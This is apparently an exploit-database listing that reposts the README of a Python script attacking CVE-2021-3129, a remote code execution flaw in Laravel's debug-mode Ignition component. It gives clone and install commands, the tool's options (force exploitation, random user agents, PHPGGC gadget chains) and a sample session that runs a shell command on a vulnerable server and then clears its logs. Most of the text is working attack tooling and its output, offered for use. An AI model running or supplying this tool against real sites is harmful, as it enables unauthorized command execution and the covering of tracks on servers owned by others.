Exploit for Vulnerability in Facade Ignition CVE-2021-3129

Name: Exploit for Vulnerability in Facade Ignition CVE-2021-3129
Rating: 5 (160 reviews)
2022-04-16 | CVSS 7.5
## https://sploitus.com/exploit?id=35896337-DA85-5D42-B9FC-4DF2E3EC881E
# CVE-2021-3129 - Laravel RCE

## About
The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.<br>
This script allows you to write/execute commands on a website running <b>Laravel <= v8.4.2</b>, that has "APP_DEBUG" set to "true" in its ".env" file.

It currently has support for <b>searching the log file</b>, <b>executing commands</b>, <b>writing to the log file</b>, and support for <b>clearing log files</b>.

## Setup
```
$ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
$ cd CVE-2021-3129
# pip install -r requirements.txt
# python3 CVE-2021-3129.py --help
```

## Options
```
usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua]
                        [--chain CHAIN] [--chains]

Exploit CVE-2021-3129 - Laravel vulnerability exploit script

optional arguments:
  -h, --help     show this help message and exit
  --host HOST    Host URL to use exploit on
  --force        Force exploit without checking if vulnerable
  --log LOG      Full path to laravel.log file (e.g.
                 /var/www/html/storage/logs/laravel.log)
  --ua           Randomize User-Agent for requests
  --chain CHAIN  Select PHPGGC chain. Use "--chains" parameter to view all
                 available chains.
  --chains       View available chains for the "--chain" parameter
```

## Example
```
$ python3 CVE-2021-3129.py --host http://127.0.0.1/public/
Laravel Debug Mode CVE script
[•] Made by: https://jvdpoll.nl
[@] Starting exploit on "http://127.0.0.1/public/"...
[@] Testing vulnerable URL http://127.0.0.1/public/_ignition/execute-solution...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Log path found: "/home/laravel/web/storage/logs/laravel.log"
[•] Laravel log found: "/home/laravel/web/storage/logs/laravel.log".
[•] Laravel version found: "7.22.4".
[√] Laravel log file set to "/home/laravel/web/storage/logs/laravel.log".
[•] Use "?" for a list of all possible actions.
[?] Please enter a command to execute: help
[•] Available commands:
    exit - Exit program.
    help - Shows available commands.
    clear_logs - Clears Laravel logs.
    execute <command> - Execute system command.
    write <command> - Write to log file.
[?] Please enter a command to execute: execute ls /home/laravel/web/
[@] Executing command "ls /home/laravel/web/"...
[@] Generating payload...
[√] Generated payload.
[@] Clearing logs...
[√] Cleared logs.
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payload...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Result:

README.md
app
artisan
bootstrap
composer.json
composer.lock
config
database
package.json
phpunit.xml
public
resources
routes
server.php
storage
tests
vendor
webpack.mix.js

[@] Clearing logs...
[√] Cleared logs.
```

## Future:
- [ ] Automatically determine PHPGCC chain if version detected while scanning.

## Credits
- [PHPGGC](https://github.com/ambionics/phpggc)